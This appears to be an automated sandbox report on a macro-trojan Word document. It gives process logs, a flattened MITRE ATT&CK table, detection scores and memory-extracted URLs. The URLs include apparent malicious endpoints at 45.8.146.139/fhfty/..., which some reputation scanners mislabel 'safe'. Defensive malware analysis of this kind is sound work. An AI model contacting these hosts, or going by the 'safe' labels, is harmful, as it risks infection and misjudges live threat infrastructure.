Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\VBA7.1\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7.1\
Source: WINWORD.EXE, 00000000.00000000.303139501.000000000B0EF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352872367.000000000B0EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: WINWORD.EXE, 00000000.00000000.344345051.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.311307089.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352795200.0000000001A30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: WINWORD.EXE, 00000000.00000000.344345051.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.311307089.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352795200.0000000001A30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: WINWORD.EXE, 00000000.00000000.344345051.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.311307089.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352795200.0000000001A30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: WINWORD.EXE, 00000000.00000000.344345051.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.311307089.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352795200.0000000001A30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts12
Scripting		Path Interception2
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Non-Application Layer Protocol		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts32
Exploitation for Client Execution		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
Application Layer Protocol		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
Process Injection		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Ingress Tool Transfer		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
Scripting		NTDS2
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cnewton doc 08.11.2022.doc22%VirustotalBrowse
cnewton doc 08.11.2022.doc15%ReversingLabsScript-Macro.Trojan.Amphitryon
cnewton doc 08.11.2022.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://outlook.office.com20060%Avira URL Cloudsafe
http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f71USERNAME=userUSERPROFILE=C:0%Avira URL Cloudsafe
https://cdn.entity.0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fe0%Avira URL Cloudsafe
http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fn0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fOOC:0%Avira URL Cloudsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.office.net.&0%Avira URL Cloudsafe
https://api.cortana.aiU0%Avira URL Cloudsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.office.netA&.H0%Avira URL Cloudsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://outlook.office.comBr0%Avira URL Cloudsafe
https://ncus.contentsync.0%URL Reputationsafe
https://api.cortana.aiL0%Avira URL Cloudsafe
https://onedrive.live.comew0%Avira URL Cloudsafe
https://substrate.office.comP0%URL Reputationsafe
https://api.diagnostics.office.comom0%Avira URL Cloudsafe
https://substrate.office.comW0%Avira URL Cloudsafe
https://wus2.contentsync.0%URL Reputationsafe
https://globaldisco.crm.dynamics.comom0%Avira URL Cloudsafe
https://www.odwebp.svc.msom0%Avira URL Cloudsafe
https://powerlift.acompli.netPrqL0%Avira URL Cloudsafe
https://lifecycle.office.comov0%Avira URL Cloudsafe
https://dataservice.o365filtering.comVb0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://outlook.office.com2006WINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://shell.suite.office.com:1443WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
    		high
    http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f71USERNAME=userUSERPROFILE=C:WINWORD.EXE, 00000000.00000000.310100247.000000000DCA8000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://autodiscover-s.outlook.com/WINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
      		high
      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrWINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
        		high
        https://cdn.entity.AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
        • URL Reputation: safe
        		unknown
        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
          		high
          https://login.windows.net/common/oauth2/authorizetenk%MWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
            		high
            https://rpsticket.partnerservices.getmicrosoftkey.comWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
            • URL Reputation: safe
            		unknown
            https://lookup.onenote.com/lookup/geolocation/v1WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
              		high
              https://login.windows.net/common/oauth2/authorizeaz&LWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                https://login.windows.net/common/oauth2/authorizePhWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                    		high
                    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                      		high
                      https://api.aadrm.com/WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://login.windows.net/common/oauth2/authorizeseWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://purl.oclc.org/ooxml/drawingml/diagram-E0WINWORD.EXE, 00000000.00000000.303139501.000000000B0EF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352872367.000000000B0EF000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://login.windows.net/common/oauth2/authorizeAxWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesWINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                              		high
                              https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppWINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://api.microsoftstream.com/api/WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                  		high
                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                    		high
                                    https://cr.office.comWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                      		high
                                      https://clients.config.office.net/user/v1.0/android/policies_JWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-feWINWORD.EXE, 00000000.00000000.331890958.000000000DCF2000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fnWINWORD.EXE, 00000000.00000000.319834136.0000000012362000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://res.getmicrosoftkey.com/api/redemptioneventsWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://tasks.office.comWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                          		high
                                          https://officeci.azurewebsites.net/api/WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://weather.service.msn.com/data.aspxBDWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile5QlOWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-fOOC:WINWORD.EXE, 00000000.00000000.303139501.000000000B0EF000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000000.352872367.000000000B0EF000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://login.windows.net/common/oauth2/authorize#WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://my.microsoftpersonalcontent.comWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://login.windows-ppe.net/common/oauth2/authorizewM%MWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://login.windows.net/common/oauth2/authorize$WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://store.office.cn/addinstemplateWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://api.office.net.&WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    https://api.cortana.aiUWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://login.windows.net/common/oauth2/authorizeoxWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://messaging.engagement.office.com/WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                        		high
                                                        https://onedrive.live.com/embed?iWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                            		high
                                                            https://login.windows.net/common/oauth2/authorize/2WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.odwebp.svc.msAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://api.office.netA&.HWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              https://api.powerbi.com/v1.0/myorg/groupsAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                		high
                                                                https://web.microsoftstream.com/video/WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                  		high
                                                                  https://api.addins.store.officeppe.com/addinstemplateWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://graph.windows.netWINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                    		high
                                                                    https://api.powerbi.com/beta/myorg/importshG&MWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://outlook.office.comBrWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://login.windows.net/common/oauth2/authorizerdmlWINWORD.EXE, 00000000.00000000.306545880.000000000D3BB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                          		high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                            		high
                                                                            https://ncus.contentsync.WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://api.cortana.aiLWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://onedrive.live.comewWINWORD.EXE, 00000000.00000000.327740515.000000000D436000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FacebookfWINWORD.EXE, 00000000.00000000.305945925.000000000D311000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/WINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                		high
                                                                                http://weather.service.msn.com/data.aspxAE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                  		high
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksCPWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://outlook.office365.com/autodiscover/autodiscover.WINWORD.EXE, 00000000.00000000.306836673.000000000D407000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://substrate.office.comPWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2AreaWINWORD.EXE, 00000000.00000000.306148125.000000000D349000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmp, AE1D8E82-09A3-4CE3-BB95-E3559641C73B.0.drfalse
                                                                                          		high
                                                                                          https://login.windows.net/common/oauth2/authorizeOhWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://api.diagnostics.office.comomWINWORD.EXE, 00000000.00000000.359196523.000000000D98F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
